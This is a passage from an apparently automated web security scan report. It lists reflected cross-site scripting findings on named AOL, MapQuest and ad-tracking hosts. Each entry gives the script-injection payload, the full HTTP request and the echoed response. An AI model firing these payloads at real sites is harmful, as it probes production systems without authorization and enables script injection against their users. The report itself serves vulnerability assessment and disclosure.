The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>9d318ae0ab8 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&19297<script>alert(1)</script>9d318ae0ab8; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:53 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&19297<script>alert(1)</script>9d318ae0ab8', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:4 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 2cb01<script>alert(1)</script>6aef59c8b14 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&2cb01<script>alert(1)</script>6aef59c8b14; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:53 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&2cb01<script>alert(1)</script>6aef59c8b14', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 3ba10<script>alert(1)</script>1bfb37122a3 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&3ba10<script>alert(1)</script>1bfb37122a3; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:54 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&3ba10<script>alert(1)</script>1bfb37122a3' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 7d5aa<script>alert(1)</script>64b08d03421 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&7d5aa<script>alert(1)</script>64b08d03421; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:53 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&7d5aa<script>alert(1)</script>64b08d03421', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket. ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload d77e0<script>alert(1)</script>688bd651f98 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&d77e0<script>alert(1)</script>688bd651f98; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:54 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&d77e0<script>alert(1)</script>688bd651f98=&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&d77e0<script>alert(1)</script>688bd651f98', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
1.780. http://blackvoices.aol.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blackvoices.aol.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b47"><script>alert(1)</script>3d9f57145f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?c2b47"><script>alert(1)</script>3d9f57145f7=1 HTTP/1.1 Host: blackvoices.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.781. http://body.aol.com/diet-fitness [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://body.aol.com
Path:
/diet-fitness
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f70c"><script>alert(1)</script>9e72d383a62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /diet-fitness?5f70c"><script>alert(1)</script>9e72d383a62=1 HTTP/1.1 Host: body.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.782. http://body.aol.com/health [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://body.aol.com
Path:
/health
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bca"><script>alert(1)</script>7c84e565a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /health?92bca"><script>alert(1)</script>7c84e565a30=1 HTTP/1.1 Host: body.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.783. http://massively.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://massively.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a395b"><script>alert(1)</script>1fd499ba9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?a395b"><script>alert(1)</script>1fd499ba9ae=1 HTTP/1.1 Host: massively.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbdf"style%3d"x%3aexpression(alert(1))"9fc4a542932 was submitted in the REST URL parameter 2. This input was echoed as 6cbdf"style="x:expression(alert(1))"9fc4a542932 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aolus/searchProfiles6cbdf"style%3d"x%3aexpression(alert(1))"9fc4a542932 HTTP/1.1 Host: memberdirectory.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://profiles.aim.com/searchProfiles6cbdf"style="x:expression(alert(1))"9fc4a542932"> ...[SNIP]...
1.785. http://mmafighting.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mmafighting.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1968d"><script>alert(1)</script>dae7858fae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?1968d"><script>alert(1)</script>dae7858fae7=1 HTTP/1.1 Host: mmafighting.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.786. http://new.mapquest.com/accelerator [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://new.mapquest.com
Path:
/accelerator
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef25"><script>alert(1)</script>3c75f6d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /accelerator?2ef25"><script>alert(1)</script>3c75f6d7991=1 HTTP/1.1 Host: new.mapquest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.787. http://new.mapquest.com/directions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://new.mapquest.com
Path:
/directions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117fd"><script>alert(1)</script>cf20941f11a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /directions?117fd"><script>alert(1)</script>cf20941f11a=1 HTTP/1.1 Host: new.mapquest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.788. http://new.mapquest.com/routeplanner [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://new.mapquest.com
Path:
/routeplanner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a335"><script>alert(1)</script>1b481572ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
